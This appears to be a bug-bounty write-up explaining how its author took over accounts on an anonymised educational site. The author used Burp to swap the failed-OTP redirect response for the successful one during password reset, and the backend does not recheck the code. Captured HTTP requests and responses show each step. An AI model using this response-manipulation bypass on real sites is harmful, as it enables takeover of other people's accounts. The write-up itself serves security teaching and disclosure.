.png)
6 days ago
20 BOOK THIS SPACE FOR AD
ARTICLE AD
Hi guys,
Today I want you to share my one of account takeovers in an educational websites which had over 10k users.
If this article is supported, I will share more interesting vulnerabilities for you guys.❤️
Let’s get to the point …
This is the correct OTP which I sent to test the response and I captured it with burp👇
The request:
Host: vulnerablewebsite.com
Cookie: vulnerablewebsite_session=thesession
XSRF-TOKEN=xsrftoken
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: https://vulnerablewebsite
Dnt: 1
Referer: https://vulnerablewebsite.com/collegians/forget_password
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
_token=NPe4bndjMgJQtWfELILsS8haeHOrOSRIQL1K86bK&collegian_mobile=mynumber&collegian_smsCode=180787
The response:
HTTP/2 302 FoundServer: nginx
Date: Sat, 16 Nov 2024 16:06:41 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: private, must-revalidate
Pragma: no-cache
Expires: -1
Vary: Accept-Encoding,User-Agent
Set-Cookie: XSRF-TOKEN=xsrftoken
Set-Cookie: vulnerablewebsite_session=thesession
Strict-Transport-Security: max-age=31536000; includeSubDomains
Location: https://vulnerablewebsite.com/collegians/create_password
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="0;url='https://vulnerablewebsite/collegians/create_password'" />
<title>Redirecting to https://vulnerablewebsite.com/collegians/create_password</title>
</head>
<body>
Redirecting to <a href="https://vulnerablewebsite.com/collegians/create_password">https://vulnerablewebsite.com/collegians/create_password</a>.
</body>
</html>
And when I send the wrong OTP I got this response:
HTTP/2 302 FoundServer: nginx
Date: Sat, 16 Nov 2024 16:07:12 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: private, must-revalidate
Pragma: no-cache
Expires: -1
Vary: Accept-Encoding,User-Agent
Set-Cookie: XSRF-TOKEN=xsrftoken
Set-Cookie: vulnerablewebsite_session=thesession
Strict-Transport-Security: max-age=31536000; includeSubDomains
Location: https://vulnerablewebsite.com/collegians/forget_password
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="0;url='https://vulnerablewebsite.com/collegians/forget_password'" />
<title>Redirecting to https://vulnerablewebsite.com/collegians/forget_password</title>
</head>
<body>
Redirecting to <a href="https://vulnerablewebsite.com/collegians/forget_password">https://vulnerablewebsite.com/collegians/forget_password</a>.
</body>
</html>
The important point of these two requests is Location Header and the body.
The correct OTP leads us to create_password path which is:
Location: https://vulnerablewebsite.com/collegians/create_password<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="0;url='https://vulnerablewebsite/collegians/create_password'" />
<title>Redirecting to https://vulnerablewebsite.com/collegians/create_password</title>
</head>
<body>
Redirecting to <a href="https://vulnerablewebsite.com/collegians/create_password">https://vulnerablewebsite.com/collegians/create_password</a>.
</body>
</html>
Now in this part, I intercepted the response with burp and replaced the correct form instead of wrong form and the website led me to a page which I had to set my new password !!
I set my new password in the opening page and this request sent to server:
POST /collegians/create_password HTTP/2Host: vulnerablewebsite.com
Cookie: vulnerablewebsite_session=thesession
XSRF-TOKEN=xsrftoken
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
Origin: https://vulnerablewebsite.com
Dnt: 1
Referer: https://vulnerablewebsite.com/collegians/create_password
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
_token=NPe4bndjMgJQtWfELILsS8haeHOrOSRIQL1K86bK&newPassword=test1234&newPassword_confirmation=test1234&remember=on
And Booom! I could go to my dashboard and password has changed !!
If in POST /collegians/create_password request, the OTP code check twice in backend, It would be fine ! but … :))
and finally I could take over the account.
I hope you guys like it ❤️
Bengali (Bangladesh) · 
English (United States) ·